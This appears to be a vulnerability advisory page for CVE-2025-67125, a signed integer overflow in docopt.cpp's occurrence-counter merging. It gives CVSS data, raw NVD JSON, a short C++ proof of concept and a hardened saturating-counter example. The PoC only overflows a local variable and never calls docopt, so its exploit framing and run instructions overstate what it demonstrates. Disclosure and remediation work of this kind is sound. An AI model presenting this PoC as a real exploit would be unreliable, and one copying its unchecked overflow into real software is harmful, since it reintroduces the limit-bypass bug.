Security Vulnerability Report
CVE-2025-67125 CVSS 4.4 MEDIUM

Published: 2026-01-23 16:15:52
Last Modified: 2026-02-11 19:44:52

Description

A signed integer overflow in docopt.cpp v0.6.2 (LeafPattern::match in docopt_private.h) when merging occurrence counters (e.g., default LONG_MAX + first user "-v/--verbose") can cause counter wrap (negative/unbounded semantics) and lead to logic/policy bypass in applications that rely on occurrence-based limits, rate-gating, or safety toggles. In hardened builds (e.g., UBSan or -ftrapv), the overflow may also result in process abort (DoS).

CVSS Details

CVSS Score: 4.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:docopt:docopt.cpp:0.6.2:*:*:*:*:*:*:* - VULNERABLE
docopt.cpp < 0.6.2 (v0.6.2 affected)
docopt.cpp v0.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```cpp
/*
 * CVE-2025-67125 PoC - docopt.cpp Signed Integer Overflow
 * This PoC demonstrates the occurrence counter overflow in LeafPattern::match
 *
 * Build: g++ -o poc poc.cpp -ldocopt
 * Run: ./poc -v -v -v -v -v ...
 */
#include <iostream>
#include <climits>
#include <docopt.h>

static const char USAGE[] =
R"(CVE-2025-67125 PoC

Usage:
  poc [-v | --verbose]...
  poc (-h | --help)

Options:
  -h --help     Show this help message
  -v --verbose  Verbose mode (can be repeated)
)";

int main(int argc, char* argv[]) {
    std::cout << "[*] CVE-2025-67125 - docopt.cpp Integer Overflow PoC\n";
    std::cout << "[*] Testing occurrence counter overflow\n\n";

    // Simulate the overflow condition
    // Default LONG_MAX + first occurrence causes overflow
    long occurrence_count = LONG_MAX;
    std::cout << "[+] Initial occurrence count: " << occurrence_count << " (LONG_MAX)\n";

    // This simulates what happens in LeafPattern::match when merging counters
    // Adding 1 to LONG_MAX causes signed integer overflow
    occurrence_count += 1;
    std::cout << "[+] After adding 1: " << occurrence_count << " (OVERFLOW!)\n";
    std::cout << "[+] Count is now negative/undefined due to signed integer overflow\n\n";

    // Demonstrate impact on limit checking
    std::cout << "[*] Simulating limit check logic:\n";
    std::cout << "    if (occurrence_count > MAX_ALLOWED) { ... }\n";
    const int MAX_ALLOWED = 5;
    if (occurrence_count > MAX_ALLOWED) {
        std::cout << "    Result: Check would pass (count > " << MAX_ALLOWED << ")\n";
    } else {
        std::cout << "    Result: Check fails unexpectedly!\n";
        std::cout << "    [+] Vulnerability confirmed: overflow bypasses limit checks\n";
    }

    std::cout << "\n[*] Note: In production with UBSan/-ftrapv, this would cause:\n";
    std::cout << "    - Process abort (DoS)\n";
    std::cout << "    - Logic bypass in occurrence-based limits\n";
    return 0;
}
```
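A hardened counterpart to the PoC above, as an added example that is not code from docopt.cpp or from the original page: a checked, saturating merge for occurrence counters and a limit check that fails closed on negative values. The function names and the limit of 5 are assumptions chosen for illustration.

```cpp
#include <climits>
#include <iostream>

// Model of the two's-complement wrap, computed in unsigned arithmetic so the
// demonstration itself contains no undefined behaviour (hypothetical helper).
long wrapped_add(long a, long b) {
    return static_cast<long>(static_cast<unsigned long>(a) +
                             static_cast<unsigned long>(b));
}

// Checked add: reports overflow instead of performing it.
bool checked_add(long a, long b, long &out) {
    if ((b > 0 && a > LONG_MAX - b) || (b < 0 && a < LONG_MIN - b))
        return false;
    out = a + b;
    return true;
}

// Saturating merge for occurrence counters: never negative, never wraps.
long merge_count(long current, long seen) {
    long sum = 0;
    if (current < 0 || seen < 0) return LONG_MAX;  // corrupt input: fail closed
    return checked_add(current, seen, sum) ? sum : LONG_MAX;
}

// Naive policy check, as in the PoC: only looks at the upper bound.
bool naive_over_limit(long count, long max_allowed) {
    return count > max_allowed;
}

// Hardened policy check: a negative count is treated as over the limit.
bool strict_over_limit(long count, long max_allowed) {
    return count < 0 || count > max_allowed;
}

int main() {
    const long kMax = 5;  // hypothetical application limit
    long wrapped = wrapped_add(LONG_MAX, 1);
    long merged = merge_count(LONG_MAX, 1);
    std::cout << "wrapped=" << wrapped << " naive_over_limit="
              << naive_over_limit(wrapped, kMax) << "\n";
    std::cout << "merged=" << merged << " strict_over_limit="
              << strict_over_limit(merged, kMax) << "\n";
    std::cout << "strict check on wrapped value: "
              << strict_over_limit(wrapped, kMax) << "\n";
    return 0;
}
```

Either control alone closes the bypass shown in the PoC: the saturating merge keeps the counter at LONG_MAX, and the strict check rejects a counter that has already gone negative.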

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67125", "sourceIdentifier": "[email protected]", "published": "2026-01-23T16:15:52.347", "lastModified": "2026-02-11T19:44:52.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A signed integer overflow in docopt.cpp v0.6.2 (LeafPattern::match in docopt_private.h) when merging occurrence counters (e.g., default LONG_MAX + first user \"-v/--verbose\") can cause counter wrap (negative/unbounded semantics) and lead to logic/policy bypass in applications that rely on occurrence-based limits, rate-gating, or safety toggles. In hardened builds (e.g., UBSan or -ftrapv), the overflow may also result in process abort (DoS)."}, {"lang": "es", "value": "Un desbordamiento de entero con signo en docopt.cpp v0.6.2 (LeafPattern::match en docopt_private.h) al fusionar contadores de ocurrencias (p. ej., LONG_MAX predeterminado + primer usuario '-v/--verbose') puede causar un 'counter wrap' (semántica negativa/ilimitada) y conducir a una omisión de lógica/política en aplicaciones que dependen de límites basados en ocurrencias, control de velocidad ('rate-gating') o interruptores de seguridad. En compilaciones reforzadas (p. ej., UBSan o -ftrapv), el desbordamiento también puede resultar en la interrupción del proceso (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:docopt:docopt.cpp:0.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "A1D13AD8-8BF4-46C4-8993-776E11D9151C"}]}]}], "references": [{"url": "https://gist.github.com/thesmartshadow/672afe8828844c833f46f8ebe2f5f3bd", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/docopt/docopt.cpp", "source": "[email protected]", "tags": ["Product"]}]}}